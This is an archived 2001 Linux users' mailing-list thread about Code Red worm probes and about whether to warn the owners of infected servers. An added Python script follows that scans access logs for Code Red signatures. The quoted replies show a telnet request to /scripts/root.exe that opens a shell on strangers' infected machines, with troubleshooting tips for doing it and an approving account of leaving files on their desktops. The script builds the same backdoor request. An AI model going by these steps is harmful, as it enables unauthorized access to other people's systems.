CR worm infection attempts

Derek Neighbors plug-discuss@lists.PLUG.phoenix.az.us
Wed, 8 Aug 2001 16:10:44 -0500 (CDT)


That is the problem.

I looked at my logs out of curiosity.  I was AMAZED at the figures.  I
took the first IP and hit it and checked for the root.exe exploit.  Sure
enough it was WIDE open.

Now I had a DILEMMA on my hands.  Do I notify this company or not?  I had
no malicious intent nor did I do anything.  The 'good' in me wanted to
notify them so that they were not 'toasted' by one with 'ill' intent.

HOWEVER, I feared lawsuit, death and dismemberment.  So I said not a word.
I looked at their website about 4 hours later and they were defaced. :(

What kind of a world is it?  I mean if I was walking down the street with
my fly open, I would hope to God someone would tell me.  However, I
suppose even in that case you should be careful.  I mean after all,
notifying someone that their fly was open means you were looking at
their crotch.  If you were looking at their crotch you must have been
wanting to rape them or harass them.

Where does the silliness stop?  

-Derek

On Wed, 8 Aug 2001, Kim Allen wrote:

> I've been contacting the sites that my server logs show have been 
> hitting me with the Code Red signature and so far no one has bothered to 
> respond except for one. However that site has told me how secure they are 
> and how there is no way that they have any problems. When I sent them the 
> portions of my server logs showing they do have a problem they threatened 
> legal action. Has anyone else had this type of response?
> 
> > To answer your question... make sure you're hitting enter TWICE after
> > the command.
> > 
> > As a security guy myself, I'm deeply troubled by what I'm finding.
> > Check it out:
> > 
> > [gary@t0psecret /tmp]# telnet xxx.xxx.xxx.xxx 80
> > Trying xxx.xxx.xxx.xxx...
> > Connected to xxx.xxx.xxx.xxx.
> > Escape character is '^]'.
> > GET /scripts/root.exe HTTP/1.0
> > 
> > HTTP/1.1 200 OK
> > Server: Microsoft-IIS/5.0
> > Date: Mon, 06 Aug 2001 04:22:13 GMT
> > Content-Type: application/octet-stream
> > Microsoft Windows 2000 [Version 5.00.2195]
> > (C) Copyright 1985-1999 Microsoft Corp.
> > 
> > c:\inetpub\scripts>
> > 
> > From here, I've been leaving a nice text file on the \\ALL USERS\\ desktops
> > that explains how I did it, and why they need to pay attention to
> > security patches. :)
> > 
> > Hopefully they won't take it the 'wrong' way.
> > 
> > ~g~
> > 
> > On 05 Aug 2001 15:15:02 -0700, Craig White wrote:
> > > Wayne Conrad wrote:
> > > > 
> > > > On Sun, 05 August 2001, "J.Francois" wrote:
> > > > > I got tired of counting and just started putting the info into my IDS page.
> > > > > That way I can send complaints and point them to a URL so I don't have to
> > > > > keep recreating the same data each time.
> > > > 
> > > > Are you putting the IPs up too?  Every one of the CRII-infected boxes is rooted...  I wonder about the goodness of publishing a list of known rooted boxes.
> > > >     Wayne
> > > ________________________________________________
> > > 
> > > I've been trying that out
> > > 
> > > telnet ipaddress_from_my_httpd_access_log 80
> > > 
> > > GET /scripts/root.exe HTTP/1.0
> > > 
> > > but I can't get a command prompt - what am I missing?
> > > 
> > > Craig
> > > ________________________________________________
> > > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
> > > 
> > > PLUG-discuss mailing list  -  PLUG-discuss@lists.PLUG.phoenix.az.us
> > > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
> > > 
> > 
> > 
> 
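The thread above does two things by hand: picks Code Red hits out of a web server's access log, and confirms a Code Red II infection by requesting /scripts/root.exe and seeing a cmd.exe prompt come back. The script below is an added example that automates both checks offline; it is not code from this thread or from any of its posters. It assumes the access log is in NCSA common log format, uses the well-known worm signatures (Code Red I hits /default.ida with a long run of 'N' or 'X' before the shellcode; Code Red II leaves root.exe, a copy of cmd.exe, in /scripts and /MSADC and maps the C: and D: drives as /c and /d), and the sample log lines and sample HTTP response are constructed here using documentation address ranges rather than real hosts. The label names and function names are this example's own.

```python
"""Detection helpers for Code Red / Code Red II activity (added example,
not code from the PLUG thread). Assumes NCSA common log format; the sample
log lines and sample response below are constructed, not captured."""
import re
from collections import Counter, defaultdict
from typing import Optional

# NCSA common log format: host ident authuser [date] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)'
    r'(?: (?P<proto>HTTP/[\d.]+))?" (?P<status>\d{3}) (?P<size>\S+)'
)

# Code Red I overflows idq.dll via GET /default.ida with a long filler of
# 'N' (first variant) or 'X' (second variant) ahead of the shellcode bytes.
CODERED_IDA_RE = re.compile(r'^/default\.ida\?(N{50,}|X{50,})', re.IGNORECASE)

# Paths Code Red II leaves behind on a compromised IIS host; a request for
# one of them from outside is someone (worm or human) probing the backdoor.
CRII_BACKDOOR_RE = re.compile(
    r'^/(?:scripts|msadc)/root\.exe|^/[cd]/winnt/system32/cmd\.exe',
    re.IGNORECASE,
)


def classify_request(path: str) -> Optional[str]:
    """Label a worm-related request path, or return None if it looks benign."""
    m = CODERED_IDA_RE.match(path)
    if m:
        return "codered-v1-probe" if m.group(1)[0].upper() == "N" else "codered-v2-probe"
    if CRII_BACKDOOR_RE.match(path):
        return "crii-backdoor-probe"
    return None


def parse_line(line: str) -> Optional[dict]:
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan_log(lines) -> dict:
    """Map source IP -> Counter of labels; unparseable and benign lines are skipped."""
    hits = defaultdict(Counter)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        label = classify_request(rec["path"])
        if label:
            hits[rec["ip"]][label] += 1
    return dict(hits)


def is_crii_shell_response(raw: bytes) -> bool:
    """True if a response to GET /scripts/root.exe looks like the CRII backdoor
    answering: an HTTP 200 whose body carries a cmd.exe banner and prompt."""
    status_line = raw.split(b"\r\n", 1)[0]
    return (
        status_line.startswith(b"HTTP/1.") and b" 200 " in status_line
        and b"Microsoft Windows" in raw
        and re.search(rb"[A-Za-z]:\\inetpub\\scripts>", raw) is not None
    )


def probe_request(host: str, path: str = "/scripts/root.exe") -> bytes:
    """Raw HTTP/1.0 request for the backdoor path. The empty line (the second
    'enter' mentioned in the thread) terminates the header block; without it
    the server keeps waiting and no prompt ever appears."""
    return f"GET {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode()


# Constructed sample log lines (documentation ranges, not real hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Aug/2001:04:22:13 -0700] "GET /default.ida?' + "N" * 224
    + '%u9090%u6858%ucbd3 HTTP/1.0" 404 278',
    '192.0.2.11 - - [06/Aug/2001:04:25:01 -0700] "GET /default.ida?' + "X" * 224
    + '%u9090%u6858%ucbd3 HTTP/1.0" 404 278',
    '192.0.2.11 - - [06/Aug/2001:04:26:40 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0',
    '198.51.100.7 - - [06/Aug/2001:05:01:17 -0700] "GET /index.html HTTP/1.0" 200 1043',
    'garbage line that should be skipped',
]

# Constructed response of the kind quoted in the thread.
SAMPLE_SHELL_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/5.0\r\n"
    b"Content-Type: application/octet-stream\r\n\r\n"
    b"Microsoft Windows 2000 [Version 5.00.2195]\r\n"
    b"(C) Copyright 1985-1999 Microsoft Corp.\r\n\r\nc:\\inetpub\\scripts>"
)

if __name__ == "__main__":
    for ip, counts in sorted(scan_log(SAMPLE_LOG).items()):
        print(ip, dict(counts))
    print("backdoor answering:", is_crii_shell_response(SAMPLE_SHELL_RESPONSE))
```

Feed `scan_log` your real access log one line at a time and the per-IP counts give you the list the thread is talking about; a source that shows both a `/default.ida` probe and a `/scripts/root.exe` request is almost certainly a Code Red II victim, and `is_crii_shell_response` tells you whether a captured reply to the probe is the backdoor itself rather than a normal 404.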